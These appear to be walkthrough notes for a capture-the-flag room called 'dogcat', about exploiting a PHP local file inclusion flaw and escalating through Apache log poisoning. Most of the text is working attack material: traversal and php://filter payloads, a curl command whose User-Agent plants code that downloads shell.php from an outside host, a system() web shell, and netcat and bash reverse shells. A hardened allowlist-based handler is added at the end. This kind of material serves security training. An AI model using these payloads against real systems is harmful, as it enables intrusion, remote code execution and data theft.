dogcat
I made a website where you can look at pictures of dogs and/or cats! Exploit a PHP application via LFI and break out of a docker container.
Walkthrough video: https://www.bilibili.com/video/BV1WN4y1w784/
<a href=index.php?page=file1.php> Files </a>
<?php
$page = $_GET['page'];
include($page);
?>
Typical payload:
http://localhost/index.php?page=../../../../../../etc/passwd
passthru()
http://localhost/index.php?page=http://host.com/test.php
http://localhost/index.php?page=http://host.com/test.php?cmd=cat /etc/passwd
http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=etc/passwd%00
http://example.com/index.php?page=../../etc/passwd
http://example.com/index.php?page=%252e%252e%252f
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
Can be chained with a compression wrapper.
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
cat/../../../../../../../var/log/apache2/access.log&ext
<?php%20eval($_POST[1]);?>
10.10.175.83
curl -A "<?php file_put_contents('shell.php',file_get_contents('http://10.10.0.56:9999/shell.php'));?>" -s http://10.10.175.83
<?php system($_GET['cmd']); ?>
curl -A "<?php file_put_contents('shell.php',file_get_contents('http://10.10.0.56:9999/shell.php'));?>" -s 10.10.173.156
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.0.56 4242 >/tmp/f
<!DOCTYPE HTML>
<html>
<head>
<title>dogcat</title>
<link rel="stylesheet" type="text/css" href="/style.css">
</head>
<body>
<h1>dogcat</h1>
<i>a gallery of various dogs or cats</i>
<div>
<h2>What would you like to see?</h2>
<a href="/?view=dog"><button id="dog">A dog</button></a> <a href="/?view=cat"><button id="cat">A cat</button></a><br>
<?php
function containsStr($str, $substr) {
return strpos($str, $substr) !== false;
}
$ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
if(isset($_GET['view'])) {
if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {
echo 'Here you go!';
include $_GET['view'] . $ext;
} else {
echo 'Sorry, only dogs or cats are allowed.';
}
}
?>
</div>
</body>
</html>
<?php
function containsStr($str, $substr) {
return strpos($str, $substr) !== false;
}
$ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
// Same as Java's ternary operator: condition ? expr_if_true : expr_if_false
// If "expr1" holds, "expr2" is executed, otherwise "expr3".
// Checks whether an "ext" parameter was supplied; if not, ".php" is appended to our filename by default
if(isset($_GET['view'])) {
if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {
echo 'Here you go!';
include $_GET['view'] . $ext;
} else {
echo 'Sorry, only dogs or cats are allowed.';
}
}
?>
payload = cat/../../../../../../../var/log/apache2/access.log&ext
bash -i >& /dev/tcp/10.10.100.225/9898 0>&1
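A hardened form of the view handler shown above, added here as an example and not part of the challenge's own code. It assumes the dog and cat pages live in a views/ directory next to index.php; the substring check and the client-controlled ext parameter are replaced by an exact allowlist plus a realpath check.

```php
<?php
// Hardened dogcat view handler (added example, not the challenge's code).
// Assumption: dog.php and cat.php live in views/ beside this file.
const VIEW_DIR = __DIR__ . '/views';
const ALLOWED_VIEWS = ['dog' => 'dog.php', 'cat' => 'cat.php'];

function resolveView(?string $view): ?string {
    // Exact-match allowlist: "cat/../../../etc/passwd" or
    // "php://filter/..." are not keys, so they never reach include.
    if ($view === null || !array_key_exists($view, ALLOWED_VIEWS)) {
        return null;
    }
    $base = realpath(VIEW_DIR);
    $path = realpath(VIEW_DIR . '/' . ALLOWED_VIEWS[$view]);
    // Defence in depth: even if the table is ever edited badly, refuse any
    // canonical path that does not sit inside the views directory.
    if ($base === false || $path === false
        || strncmp($path, $base . '/', strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// No ext parameter at all: letting the client choose the extension is what
// turned "cat/../../var/log/apache2/access.log" into a valid include target.
if (isset($_GET['view'])) {
    $target = resolveView((string) $_GET['view']);
    if ($target !== null) {
        echo 'Here you go!';
        include $target;
    } else {
        echo 'Sorry, only dogs or cats are allowed.';
    }
}
```

Pair this with allow_url_include=Off and an open_basedir restriction in php.ini so that remote wrappers and log files are unreachable even if a future change reintroduces user input into include.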